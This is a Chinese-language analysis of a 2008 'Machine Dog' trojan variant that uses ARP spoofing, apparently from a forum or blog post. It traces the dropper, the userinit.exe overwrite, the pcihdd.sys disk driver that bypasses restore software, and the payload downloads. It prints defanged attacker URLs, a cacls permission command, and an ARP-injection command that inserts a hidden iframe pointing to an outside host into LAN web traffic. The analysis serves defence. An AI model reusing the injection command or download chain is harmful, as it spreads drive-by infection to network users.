机器狗病毒变种(080323带ARP攻击)病毒工作过程

Trojan/Agent.pgz“代理木马”变种pgz是“代理木马”木马家族的最新成员之一，采用MASM32/TASM32编写，病毒程序图标为“机器狗”。“代理木马”变种pgz运行后，在%SystemRoot%\System32\目录下释放一个恶意程序“userinit.exe”并调用运行（“userinit.exe”是微软操作系统启动时需要用到的程序。用户计算机一旦感染“代理木马”变种pgz，该木马就会覆盖“userinit.exe”这个文件。）。该恶意程序在被感染计算机的后台连接骇客指定站点，获取其它恶意程序的下载列表，在被感染计算机上下载大量恶意程序并自动调用运行。修改注册表，实现木马开机自动运行。在被感染计算机的%SystemRoot%\System32\drivers目录下释放一个名为“pcihdd.sys”的恶意驱动文件，该文件可创建磁盘IO接口，自动识别系统盘格式，直接读写硬盘；具有绕过“冰点还原精灵”、“影子系统”等系统保护软件的功能，致使“冰点还原系统”和“影子系统”失效，把病毒植入真实的系统中保存运行。另外，“pcihdd.sys”执行安装完毕后，“代理木马”变种pgz会自动卸载并删除该恶意驱动文件。

最近，机器狗病毒又出现变种，最新的机器狗病毒危害性比以前的更大，以前的预防补丁已经不能完全防御，其实一开始并不是机器狗主体，而是一个ARP病毒。但是这个版本的机器狗比较恶心，能防止身己被NTFS文件系统禁创建、读取的权限，

http://xxx.m111.biz/nicai.cer
有3个东东：
hp://xxx.m111.biz/x.jpg
hp://xxx.m111.biz/x1.jpg
hp://xxx.m111.biz/x2.jpg www.xybd.cn 聊天宝典
第一个x.jpg，释放一个VB程序，调用浏览器访问网站：
tp://xxx.m111.biz/tongji.htm
统计感染该病毒的人数。。。
第二个x1.jpg，主要工作：
%Temp%释放随机命名的P处理，建立pcihdd.sys文件夹
本身并不判断文件系统，直接P处理，保证pcihdd.sys、userinit.exe不被NTFS文件系统的权限控制：
Parent process:
   Path: C:\WINNT\system32\CMD.EXE
   PID: 468
   Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
   Path: C:\WINNT\system32\cacls.exe
   Information: Control ACLs Program (Microsoft Corporation)
Parent process:
   Path: C:\WINNT\system32\CMD.EXE
   PID: 468 www.xybd.cn
   Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
   Path: C:\WINNT\system32\cacls.exe
   Information: Control ACLs Program (Microsoft Corporation)
   Command line:cacls C:\winnt\system32\userinit.exe /e /p everyone:r
第三个x2.jpg ：
也差不多拉，主要是保证ARP嗅探器的文件权限不被控制，
然后释放病毒文件pvc.exe，于192.168.0.1-192.168.0.254网段
加入框架（病毒）数据包，参数为：
-idx 0 -ip 192.168.0.1-192.168.0.254 -port 80 -insert "<iframe src='hXXp://xxx.mmma.biz/js.htm' width=0 height=0></iframe>"
电脑少于5000的建议不要点上面的连接，超级卡````
'hXXp://xxx.mmma.biz/js.htm'
连接：
hXXp://xxx.mmma.biz/ps.js
这个东东加密了，解密后连接3个网址：
其中一个是流量统计的，其他2个都是加密过的，一个是unescape，另一个是8进制加密
第一个是暴风影音的漏洞，第二个是百度搜霸的漏洞
解密后得样本：
hXXp://xxx.mmma.biz/***.exe
病毒行为：
去除pcihdd.sys的文件属性，并删除原有的pcihdd.sys文件夹。
然后继续下载：
h**p://xx*.mmma.biz/big.exe
h**p://xx*.mmma.biz/big1.exe
哈哈，自始至终终于见到机器狗了（big.exe）

第2个是上面分析过的ARP病毒，哈哈`删掉

再看看那个机器狗，哈``首先检测pcihdd.sys是否存在。
若不在则注册该驱动，然后判断条件，如果满足以下条件则退出，不做其他操作：
1、不是启动分区，比如说双系统。
2、文件系统，哈哈``不会是针对FAT16的吧
3、如果是NTFS，使用了文件压缩功能，可能导致病毒驱动在计算Userinnt地址时会出现错误？
4、读取Userinnt失败（设置权限），这个版本的小狗应该还不至于出现这情况。
如果没有意外，则pcihdd.sys访问磁盘底层，读取%SystemRoot%\System32\Userinit.exe
并修改。（会穿过一些还原类的东东`）
被修改后的Userinit.exe，重启系统后联网下载东东：